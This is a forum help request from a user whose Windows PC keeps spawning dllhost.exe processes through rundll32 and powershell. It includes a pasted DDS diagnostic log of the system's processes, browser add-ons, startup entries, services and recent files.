
Multiple dllhost.exe parented by powershell.exe from rundll32.exe


8 replies to this topic

#1 firzenj

Posted 15 September 2014 - 01:31 PM

Hello,

 

I'm having the same issue as discussed in

http://www.bleepingcomputer.com/forums/t/541595/multiple-dllhostexecom-surrogate-processes-running/

And here is what I found:

 

I managed to track the route (with Process Explorer):

svchost.exe -k DcomLaunch >>> rundll32.exe >>> powershell.exe >>> dllhost.exe

 

As observed, a short time after the first dllhost.exe showed up, it duplicated itself and created a second one, which duplicated very fast to a dozen. So I killed the process tree of the second and suspended the first one (not killed it); then the duplication seemed to halt, but rundll32.exe and powershell.exe are still showing up until now, after a lot of scanning and removing malware (Malwarebytes says there are no threats).

Also I found rundll32.exe and powershell.exe will be triggered once I open explorer.exe; I'm not sure what else will trigger it. Then these two will repeatedly show up and disappear very fast, and cease to appear a long time after I close all Explorer windows and remain doing nothing.

 

I apologize for my take-as-granted actions and my nonprofessional talk above, but I hope those can assist you mighty smart guys to fight the virus or trojan and save my computer.....

 

 

As I said, I suspended one dllhost.exe.

Also I manually disabled the "AV: 360杀毒" and "SP: IObit Malware Fighter", since Avira is already taking up 50% of CPU usage.

 

 

 

DDS (Ver_2012-11-20.01) - NTFS_x86 
Internet Explorer: 9.0.8112.16563
Run by THINK at 13:36:41 on 2014-09-15
AV: Avira Desktop *Enabled/Updated* {4D041356-F94D-285F-8768-AAE50FA36859}
AV: 360杀毒 *Disabled/Updated* {6F7A6B22-2309-7CD0-AF79-D11A4916C60C}
SP: Avira Desktop *Enabled/Updated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: IObit Malware Fighter *Disabled/Updated* {A751AC20-3B48-5237-898A-78C4436BB78D}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\windows\system32\lsm.exe
C:\windows\system32\ibmpmsvc.exe
C:\windows\system32\atiesrxx.exe
C:\windows\system32\SLsvc.exe
C:\windows\system32\atieclxx.exe
q:\Program Files\Keniu\ConewRsc\conewrsc.exe
C:\windows\system32\WLANExt.exe
C:\windows\System32\spoolsv.exe
C:\Program Files\Avira\AntiVir Desktop\sched.exe
C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
C:\windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
C:\Program Files\OO Software\Defrag\oodag.exe
C:\PROGRA~1\PHAROS~1\Core\CTskMstr.exe
C:\Program Files\ThinkPad\Utilities\PWMDBSVC.EXE
C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe
C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe
C:\windows\system32\SearchIndexer.exe
C:\windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\windows\System32\WUDFHost.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\Dwm.exe
C:\windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
C:\Program Files\Avira\AntiVir Desktop\AVWEBGRD.EXE
C:\Windows\system32\igfxsrvc.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
C:\windows\system32\conime.exe
c:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe
C:\Users\THINK\Desktop\procexp_V15.40.0.0.4202571463.exe
C:\windows\System32\mobsync.exe
Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\Components\AddressSearch\1.0.0.1255\SGImeGuard.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\windows\system32\dllhost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\7.2.0.2991\SogouCloud.exe
C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files\Avira\AntiVir Desktop\avguard.exe
C:\Program Files\Avira\AntiVir Desktop\avshadow.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\windows\system32\SearchProtocolHost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\7.2.0.2991\SGTool.exe
C:\windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiPrvSE.exe
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k rpcss
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\svchost.exe -k GPSvcGroup
C:\windows\system32\svchost.exe -k LocalService
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\windows\system32\svchost.exe -k bthsvcs
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\windows\system32\svchost.exe -k imgsvc
C:\windows\system32\svchost.exe -k iissvcs
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.hao123.com/?tn=91192494_hao_pg
uDefault_Page_URL = hxxp://www.hao123.com/?tn=91192494_hao_pg
mStart Page = about:blank
uProxyOverride = local
BHO: QQDownload IE Left Helper: {00000000-12C9-4305-82F9-43058F20E8D2} - q:\program files\tencent\qqdownload\QQIEHelper01.dll
BHO: IE2EMBHO Class: {0A0DDBD3-6641-40B9-873F-BBDD26D6C14E} - q:\program files\easymule\modules\IE2EM.dll
BHO: 360sdbho Class: {0F4BF955-A127-41B7-A998-369904AA2578} - q:\program files\360\360sd\360sdbho.dll
BHO: ExplorerWnd Helper: {10921475-03CE-4E04-90CE-E2E7EF20C814} - q:\program files\iobit\iobit uninstaller\UninstallExplorer32.dll
BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - c:\program files\microsoft\bingbar\7.2.241.0\BingExt.dll
BHO: WebDetectorBHO Class: {43BEAFD9-E005-483D-A367-146BA6C8A32E} - q:\program files\tudou\飞速tudou\tudouDetector.dll
BHO: {5C255C8A-E604-49b4-9D64-90988571CECB} - <orphaned>
BHO: xiamistart Class: {658D2C4F-158A-46FB-8C96-B1C8F56DBBE9} - h:\shark\XiaMiplugin.dll
BHO: BOC ProcessProtect Class: {776B71E2-B4CC-4C94-BC7C-09103AA690B6} - c:\windows\system32\ProcessProtection.dll
BHO: 迅雷下载支持: {889D2FEB-5411-4565-8998-1DD2C5261283} - q:\program files\thunder network\thunder\bho\XunleiBHO7.99.9.172.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - <orphaned>
BHO: Advanced SystemCare Browser Protection: {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} - c:\program files\iobit\surfing protection\browerprotect\ASCPlugin_Protection.dll
BHO: AccountProtectBHO Class: {DDD362CF-523B-4BC9-8FDC-58F93B6BC945} - c:\users\think\appdata\roaming\tencent\qq\qqantiphishing\AccountProtect.dll
BHO: 迅雷下载支持组件: {DE05CF4A-7B0A-4775-B5E5-396244938679} - q:\program files\thunder network\thunder\thunder bho platform\np_tdieplat.dll
BHO: BHOImpl Class: {E1499FE7-129D-4B6E-B681-DDF21E14172C} - c:\users\think\documents\itools\plugin\iToolsBHO.dll
TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - c:\program files\microsoft\bingbar\7.2.241.0\BingExt.dll
uRun: [Adobe Acrobat Synchronizer] "q:\program files\adobe.acrobat.x.pro\acrobat\AdobeCollabSync.exe"
uRun: [360sd] "q:\program files\360\360sd\360sdrun.exe"
uRun: [HP Officejet Pro 8600 (NET)] "c:\program files\hp\hp officejet pro 8600\bin\ScanToPCActivationApp.exe" -deviceID "CN346BWGWV05KC:NW" -scfn "HP Officejet Pro 8600 (NET)" -AutoStart 1
uRun: [ctfmon] c:\windows\system32\ctfmon.exe
mRun: [avgnt] "c:\program files\avira\antivir desktop\avgnt.exe" /min
StartupFolder: c:\users\think\appdata\roaming\micros~1\windows\startm~1\programs\startup\监视墨~2.lnk - c:\windows\system32\RunDll32.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\blueto~1.lnk - c:\program files\thinkpad\bluetooth software\BTTray.exe
StartupFolder: c:\progra~2\micros~1\windows\startm~1\programs\startup\stk02n~1.lnk - c:\windows\stk02n\STK02NM.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:255
uPolicies-Explorer: AlwaysShowClassicMenu = dword:0
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-Explorer: EnableShellExecuteHooks = dword:1
mPolicies-Explorer: OldEnableShellExecuteHooks = dword:1
mPolicies-Explorer: NoDriveTypeAutoRun = dword:255
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-System: DisableCAD = dword:1
IE: &U使用米人下载并收藏 - q:\program files\namirobot\data\du.html
IE: &使用&迅雷下载 - q:\program files\thunder network\thunder\bho\\GetUrl.htm
IE: &使用&迅雷下载全部链接 - q:\program files\thunder network\thunder\bho\\GetAllUrl.htm
IE: &使用&迅雷离线下载 - q:\program files\thunder network\thunder\bho\OfflineDownload.htm
IE: &使用115优蛋下载 - q:\program files\115\udown\getUrl.htm
IE: &使用115优蛋下载全部链接 - q:\program files\115\udown\getAllUrl.htm
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: 使用旋风下载(&X) - q:\program files\tencent\qqdownload\xfgeturl.htm
IE: 使用旋风下载全部链接(&Q) - q:\program files\tencent\qqdownload\xfgetAllurl.htm
IE: 使用旋风极速下载(会员特权)(&J) - q:\program files\tencent\qqdownload\xftopspeed.htm
IE: 使用电驴下载 - q:\program files\easymule\IE2EM.htm
IE: 保存到旋风空间(会员特权)(&K) - q:\program files\tencent\qqdownload\xfofflineonly.htm
IE: 图像发送到 Bluetooth 设备(&B)... - c:\program files\thinkpad\bluetooth software\btsendto_ie_ctx.htm
IE: 导出到 Microsoft Excel(&X) - c:\progra~1\micros~2\office12\EXCEL.EXE/3000
IE: 导出到 Microsoft Office Excel(&X) - c:\progra~1\micros~2\office11\EXCEL.EXE/3000
IE: 页面发送到 Bluetooth 设备(&B)... - c:\program files\thinkpad\bluetooth software\btsendto_ie.htm
IE: {22CC3EBD-C286-43aa-B8E6-06B115F74162} - c:\program files\hewlett-packard\smart print 2.0\smartprintsetup.exe
IE: {24c1d00e-0b92-4379-880b-444fa2d740dd} - c:\users\public\thunder network\xmp4\core\program\XmpIEToolBar.htm
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {95B3F550-91C4-4627-BCC4-521288C52977} - c:\program files\pplive\pptv\PPLive.exe
IE: {CCA281CA-C863-46ef-9331-5C8D4460577F} - c:\program files\thinkpad\bluetooth software\btsendto_ie.htm
.
INFO: HKCU has more than 50 listed domains.
If you wish to scan all of them, select the 'Force scan all domains' option.
.
Trusted Zone: alipay.com
Trusted Zone: alipay.com
Trusted Zone: alisoft.com
Trusted Zone: alisoft.com
Trusted Zone: taobao.com
Trusted Zone: taobao.com
DPF: HighSpeedDownloadIE - hxxp://st2.dbank.com/netdisk/plugin/1011/DBank_downloadplugin.CAB
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} - hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: {2B24B8F5-8FAD-4933-8E6C-3CAAEEA4D217} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
DPF: {45D2E7C0-B894-43CE-B64E-F210DBEC8C94} - hxxp://www.activextest.com/activex/ActiveXScanner.CAB
DPF: {816BE035-1450-40D0-8A3B-BA7825A83A77} - hxxp://support.lenovo.com/Resources/Lenovo/AutoDetect/Lenovo_AutoDetect2.cab
DPF: {9732FB42-C321-11D1-836F-00A0C993F125} - hxxp://mheller.com/mhLbl.cab
DPF: {9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86} - hxxp://think.lenovo.com.cn/ThinkEDriver/cab/npdueng.cab
DPF: {BBF51028-5890-4817-A2C4-5F3CFCEBD7EF} - hxxp://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
TCP: NameServer = 167.206.112.138 167.206.7.4 167.206.3.168
TCP: Interfaces\{02A11E56-F72B-4333-B0A5-58A7A6EFC4DB} : DHCPNameServer = 167.206.112.138 167.206.7.4 167.206.3.168
TCP: Interfaces\{32801F40-76EE-480A-9361-DFBC38914F1B} : DHCPNameServer = 129.49.7.170
Handler: KuGoo - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\program files\kugou7\KuGoo3DownXControl.ocx
Handler: KuGoo3 - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - q:\program files\kugou7\KuGoo3DownXControl.ocx
Handler: ms-itss - <Clsid value has no data>
Handler: sacore - <Clsid value has no data>
Notify: igfxcui - igfxdev.dll
SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - c:\windows\system32\wpdshserviceobj.dll
LSA: Notification Packages =  scecli ACGina
LSA: Security Packages =  kerberos msv1_0 schannel wdigest tspkg
mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "c:\program files\common files\lightscribe\LSRunOnce.exe"
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\36.0.1985.125\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 BC;BC;c:\windows\system32\drivers\bc.sys [2014-7-20 24472]
R0 TPDIGIMN;TPDIGIMN;c:\windows\system32\drivers\ApsHM86.sys [2011-3-29 20592]
R1 avkmgr;avkmgr;c:\windows\system32\drivers\avkmgr.sys [2012-12-15 37352]
R1 BAPIDRV;BAPIDRV;c:\windows\system32\drivers\BAPIDRV.SYS [2014-7-20 165960]
R1 DVDHelp;DVD Video Region CSS free Filter Driver;c:\windows\system32\drivers\DVDHelp.sys [2011-2-4 25624]
R1 lenovo.smi;Lenovo System Interface Driver;c:\windows\system32\drivers\smiif32.sys [2008-5-19 13480]
R1 ProtectorA;ProtectorA;c:\windows\system32\drivers\ProtectorA.sys [2011-1-1 15240]
R1 QQProtect;QQProtect;c:\windows\system32\drivers\QQProtect.sys [2013-8-7 215096]
R1 Su1xDriver;Su1xDriver;c:\windows\system32\drivers\Su1xDriver.sys [2011-3-7 6144]
R2 {1BA31E5A-C098-42d8-8F88-3C9F78A2FDDC};Power Control [2011/04/29 19:35:49];q:\program files\cyberlink\powerdvd10\powerdvd10\navfilter\000.fcl [2010-3-13 87536]
R2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe [2010-5-5 172032]
R2 AntiVirSchedulerService;Avira Scheduler;c:\program files\avira\antivir desktop\sched.exe [2012-12-15 430160]
R2 AntiVirService;Avira Real-Time Protection;c:\program files\avira\antivir desktop\avguard.exe [2012-12-15 430160]
R2 AntiVirWebService;Avira Web Protection;c:\program files\avira\antivir desktop\avwebgrd.exe [2012-12-15 1021008]
R2 avgntflt;avgntflt;c:\windows\system32\drivers\avgntflt.sys [2012-12-15 97648]
R2 Conew Rescue Service;Conew Rescue Service;q:\program files\keniu\conewrsc\conewrsc.exe [2014-9-13 140696]
R2 YLMFVDISK;YLMF Virtual Diskette V1;c:\windows\system32\drivers\VirtDisk.sys [2012-3-15 23768]
R3 360AvFlt;360AvFlt mini-filter driver;c:\windows\system32\drivers\360AvFlt.sys [2014-7-20 65608]
R3 e1yexpress;Intel® Gigabit Network Connections Driver;c:\windows\system32\drivers\e1y6032.sys [2009-9-10 224384]
R3 intelkmd;intelkmd;c:\windows\system32\drivers\igdpmd32.sys [2009-12-10 4747776]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2013-7-11 23256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-9-14 110296]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys [2014-9-14 51928]
R3 NdisrdMP;NdisrdMP;c:\windows\system32\drivers\Ndisrd.sys [2011-4-30 22016]
R3 NETwNv32;___ Intel® Wireless WiFi Link 5000 系列适配器驱动程序(适用于 Windows Vista 32 位);c:\windows\system32\drivers\NETwNv32.sys [2011-8-3 7341568]
R3 rasuw;ChinaNet WLAN Adapter;c:\windows\system32\drivers\rasuw.sys [2010-2-4 33280]
R3 RegFilter;RegFilter;c:\program files\iobit\iobit malware fighter\drivers\wlh_x86\RegFilter.sys [2014-9-14 32288]
R3 TVTI2C;Lenovo SM bus driver;c:\windows\system32\drivers\tvti2c.sys [2008-2-22 37312]
S2 360rp;360 杀毒实时防护加载服务;q:\program files\360\360sd\360rps.exe [2014-7-20 251208]
S2 AntiVirMailService;Avira Mail Protection;c:\program files\avira\antivir desktop\avmailc.exe [2012-12-15 802384]
S2 dtsvc;Data Transfer Service;c:\windows\system32\DTS.exe [2009-3-18 98304]
S3 AdvancedSystemCareService7;Advanced SystemCare Service 7;q:\program files\iobit\advanced systemcare 7\ASCService.exe [2014-7-21 881952]
S3 Alidevice;Alidevice;c:\windows\system32\drivers\alidevice.sys [2010-7-1 6656]
S3 ATSwpWDF;AuthenTec TruePrint USB WDF Driver;c:\windows\system32\drivers\ATSwpWDF.sys [2009-3-19 482176]
S3 bthav;Bluetooth AV 配置文件;c:\windows\system32\drivers\bthav.sys [2008-7-10 34816]
S3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys [2012-2-26 45736]
S3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\drivers\btwl2cap.sys [2012-2-26 29472]
S3 krpr;krpr;c:\windows\system32\drivers\krpr.sys [2014-9-13 48536]
S3 ksaud;Creative USB Audio Driver;c:\windows\system32\drivers\ksaud.sys [2011-8-24 1230976]
S3 Ndisrd;WinpkFilter Service;c:\windows\system32\drivers\Ndisrd.sys [2011-4-30 22016]
S3 nmwcdnsu;Nokia USB Flashing Phone Parent;c:\windows\system32\drivers\nmwcdnsu.sys [2009-10-5 136704]
S3 nmwcdnsuc;Nokia USB Flashing Generic;c:\windows\system32\drivers\nmwcdnsuc.sys [2009-10-5 8320]
S3 p2pfilter;p2pfilter;q:\program files\p2pover\p2pfilter.sys [2005-5-10 4524]
S3 Tq_91Assistant;Tq_91Assistant;q:\program files\netdragon\91 mobile\iphone\Tq_91Assistant.sys [2011-8-7 15784]
S3 UrlFilter;UrlFilter;c:\program files\iobit\iobit malware fighter\drivers\wlh_x86\UrlFilter.sys [2014-9-14 20944]
S4 ADMonitor;AD Monitor;c:\windows\system32\ADMonitor.exe [2009-3-18 106496]
S4 ATService;AuthenTec Fingerprint Service;c:\windows\system32\AtService.exe [2009-3-18 1680632]
S4 DGPNPSEV;DriverGenius PNP Service;q:\program files\mydrivers\drivergenius2012\DgService.exe [2012-8-16 52664]
S4 FileMonitor;FileMonitor;c:\program files\iobit\iobit malware fighter\drivers\wlh_x86\FileMonitor.sys [2014-9-14 21480]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=c:\windows\notepad.exe %1
.
=============== Created Last 30 ================
.
2014-09-15 04:29:21 -------- d-----w- c:\program files\ESET
2014-09-15 03:27:36 -------- d-----w- c:\users\think\appdata\local\Avg2015
2014-09-15 03:27:10 -------- d--h--w- c:\programdata\Common Files
2014-09-15 03:27:10 -------- d-----w- c:\users\think\appdata\local\MFAData
2014-09-15 03:27:10 -------- d-----w- c:\users\think\appdata\local\Avg2014
2014-09-15 03:27:10 -------- d-----w- c:\programdata\MFAData
2014-09-14 21:20:05 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-09-14 21:19:14 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-09-14 21:19:14 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-09-14 21:19:14 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-09-14 20:21:04 -------- d-sh--w- C:\$RECYCLE.BIN
2014-09-14 16:59:51 98816 ----a-w- c:\windows\sed.exe
2014-09-14 16:59:51 256000 ----a-w- c:\windows\PEV.exe
2014-09-14 16:59:51 208896 ----a-w- c:\windows\MBR.exe
2014-09-14 16:49:58 -------- d-----w- C:\FRST
2014-09-14 05:20:13 -------- d-----w- c:\programdata\ksrbm
2014-09-14 03:58:26 48536 ----a-w- c:\windows\system32\drivers\krpr.sys
2014-09-12 23:10:13 -------- d-sh--w- c:\users\think\appdata\roaming\360Quarant
2014-09-12 23:05:18 358984 ----a-w- c:\windows\system32\drivers\Kemon.sys
2014-09-11 03:44:39 0 ----a-w- c:\windows\system32\nsyF3B8.tmp
2014-09-10 06:04:08 -------- d-----w- c:\users\think\appdata\roaming\Foxit Software
2014-09-08 18:32:31 -------- d-----w- c:\programdata\LocalStorage
2014-09-08 18:29:16 -------- d-----w- c:\users\think\appdata\roaming\IQIYI Video
2014-09-06 23:55:47 -------- d-----w- c:\users\think\appdata\local\thunder network
2014-08-27 01:49:33 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-27 01:48:56 638400 ----a-w- c:\windows\system32\drivers\dxgkrnl.sys
2014-08-27 01:48:56 37376 ----a-w- c:\windows\system32\cdd.dll
2014-08-27 01:48:29 82432 ----a-w- c:\windows\system32\consent.exe
2014-08-27 01:48:29 332800 ----a-w- c:\windows\system32\msihnd.dll
2014-08-27 01:48:29 33280 ----a-w- c:\windows\system32\appinfo.dll
2014-08-27 01:48:29 2263552 ----a-w- c:\windows\system32\msi.dll
2014-08-27 01:48:29 1993728 ----a-w- c:\windows\system32\authui.dll
2014-08-27 01:43:59 768512 ----a-w- c:\program files\common files\microsoft shared\vgx\VGX.dll
2014-08-27 01:42:53 1305088 ----a-w- c:\program files\common files\microsoft shared\ink\tipskins.dll
2014-08-27 01:42:52 2051072 ----a-w- c:\windows\system32\win32k.sys
2014-08-27 01:42:52 149504 ----a-w- c:\program files\common files\microsoft shared\ink\tabskb.dll
2014-08-27 01:42:52 114688 ----a-w- c:\program files\common files\microsoft shared\ink\TipBand.dll
2014-08-27 01:42:36 983552 ----a-w- c:\program files\windows journal\JNTFiltr.dll
2014-08-27 01:42:36 965120 ----a-w- c:\program files\windows journal\JNWDRV.dll
2014-08-27 01:42:36 1218048 ----a-w- c:\program files\windows journal\NBDoc.DLL
2014-08-27 01:42:35 937472 ----a-w- c:\program files\common files\microsoft shared\ink\journal.dll
2014-08-27 01:42:15 506880 ----a-w- c:\windows\system32\qedit.dll
2014-08-27 01:42:03 1401344 ----a-w- c:\windows\system32\msxml6.dll
2014-08-27 01:42:03 1248768 ----a-w- c:\windows\system32\msxml3.dll
2014-08-27 01:41:50 502784 ----a-w- c:\windows\system32\usp10.dll
2014-08-27 01:41:36 915392 ----a-w- c:\windows\system32\drivers\tcpip.sys
2014-08-27 01:41:36 31232 ----a-w- c:\windows\system32\drivers\tcpipreg.sys
2014-08-27 01:40:19 876032 ----a-w- c:\windows\system32\wer.dll
2014-08-24 14:48:03 -------- d-----w- C:\$360Section
2014-08-19 05:50:16 3695208 ----a-w- c:\windows\system32\SogouPY.ime
.
==================== Find3M  ====================
.
2014-09-12 22:56:54 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-12 22:56:54 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-08-27 01:44:03 1129472 ----a-w- c:\windows\system32\wininet.dll
2014-08-27 01:44:01 11776 ----a-w- c:\windows\system32\mshta.exe
2014-08-27 01:44:00 2382848 ----a-w- c:\windows\system32\mshtml.tlb
2014-08-27 01:43:59 1810432 ----a-w- c:\windows\system32\jscript9.dll
2014-08-27 01:43:59 142848 ----a-w- c:\windows\system32\ieUnatt.exe
2014-08-27 01:43:59 1427968 ----a-w- c:\windows\system32\inetcpl.cpl
2014-08-27 01:43:58 421376 ----a-w- c:\windows\system32\vbscript.dll
2014-08-27 01:43:09 273408 ----a-w- c:\windows\system32\drivers\afd.sys
2014-07-22 03:01:27 335360 ----a-w- c:\windows\system32\SysFxUI.dll
2014-07-22 03:01:27 167936 ----a-w- c:\windows\system32\drivers\portcls.sys
2014-07-22 03:01:27 1304064 ----a-w- c:\windows\system32\WMALFXGFXDSP.dll
2014-07-22 03:01:27 130048 ----a-w- c:\windows\system32\drivers\drmk.sys
2014-07-22 03:01:14 158208 ----a-w- c:\windows\system32\imagehlp.dll
2014-07-22 03:01:03 36864 ----a-w- c:\windows\system32\wshcon.dll
2014-07-22 03:01:03 172032 ----a-w- c:\windows\system32\scrrun.dll
2014-07-22 03:01:03 155648 ----a-w- c:\windows\system32\wscript.exe
2014-07-22 03:01:03 135168 ----a-w- c:\windows\system32\cscript.exe
2014-07-22 03:01:03 131072 ----a-w- c:\windows\system32\wshom.ocx
2014-07-22 03:00:52 596480 ----a-w- c:\windows\system32\FWPUCLNT.DLL
2014-07-22 03:00:51 444928 ----a-w- c:\windows\system32\IKEEXT.DLL
2014-07-22 03:00:33 993792 ----a-w- c:\windows\system32\crypt32.dll
2014-07-22 03:00:12 297984 ----a-w- c:\windows\system32\gdi32.dll
2014-07-22 02:59:48 24576 ----a-w- c:\windows\system32\cryptdlg.dll
2014-07-22 02:59:05 102608 ----a-w- c:\windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-07-22 02:58:55 25472 ----a-w- c:\windows\system32\drivers\hidparse.sys
2014-07-22 02:58:45 8704 ----a-w- c:\windows\system32\hccoin.dll
2014-07-22 02:58:45 73216 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2014-07-22 02:58:45 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2014-07-22 02:58:45 39936 ----a-w- c:\windows\system32\drivers\usbehci.sys
2014-07-22 02:58:45 23552 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2014-07-22 02:58:45 226304 ----a-w- c:\windows\system32\drivers\usbport.sys
2014-07-22 02:58:45 197632 ----a-w- c:\windows\system32\drivers\usbhub.sys
2014-07-22 02:58:45 15872 ----a-w- c:\windows\system32\hcrstco.dll
2014-07-22 02:58:03 532480 ----a-w- c:\windows\system32\comctl32.dll
2014-07-22 02:56:45 49152 ----a-w- c:\windows\system32\csrsrv.dll
2014-07-22 02:56:45 1205168 ----a-w- c:\windows\system32\ntdll.dll
2014-07-22 02:56:44 64000 ----a-w- c:\windows\system32\smss.exe
2014-07-22 02:56:44 3603904 ----a-w- c:\windows\system32\ntkrnlpa.exe
2014-07-22 02:56:44 3551680 ----a-w- c:\windows\system32\ntoskrnl.exe
2014-07-22 02:56:30 24064 ----a-w- c:\windows\system32\drivers\tssecsrv.sys
2014-07-22 02:56:30 15872 ----a-w- c:\windows\system32\icaapi.dll
2014-07-22 02:56:02 783360 ----a-w- c:\windows\system32\rpcrt4.dll
2014-07-22 02:55:48 98304 ----a-w- c:\windows\system32\cryptnet.dll
2014-07-22 02:55:48 172544 ----a-w- c:\windows\system32\wintrust.dll
2014-07-22 02:55:47 133120 ----a-w- c:\windows\system32\cryptsvc.dll
2014-07-22 02:54:13 812544 ----a-w- c:\windows\system32\certutil.exe
2014-07-22 02:54:13 41984 ----a-w- c:\windows\system32\certenc.dll
2014-07-22 02:53:47 443904 ----a-w- c:\windows\system32\win32spl.dll
2014-07-22 02:53:47 37376 ----a-w- c:\windows\system32\printcom.dll
2014-07-22 02:53:39 1082232 ----a-w- c:\windows\system32\drivers\ntfs.sys
2014-07-22 02:53:28 36864 ----a-w- c:\windows\system32\tsgqec.dll
2014-07-22 02:53:28 2691072 ----a-w- c:\windows\system32\mstscax.dll
2014-07-22 02:53:28 131072 ----a-w- c:\windows\system32\aaclient.dll
2014-07-22 02:53:07 376320 ----a-w- c:\windows\system32\winsrv.dll
2014-07-22 02:52:28 2560 ----a-w- c:\windows\system32\drivers\zh-cn\wdf01000.sys.mui
2014-07-22 02:52:27 9728 ----a-w- c:\windows\system32\Wdfres.dll
2014-07-22 02:52:27 47720 ----a-w- c:\windows\system32\drivers\WdfLdr.sys
2014-07-22 02:52:27 16896 ----a-w- c:\windows\system32\winusb.dll
2014-07-22 02:52:26 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-07-22 02:52:26 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
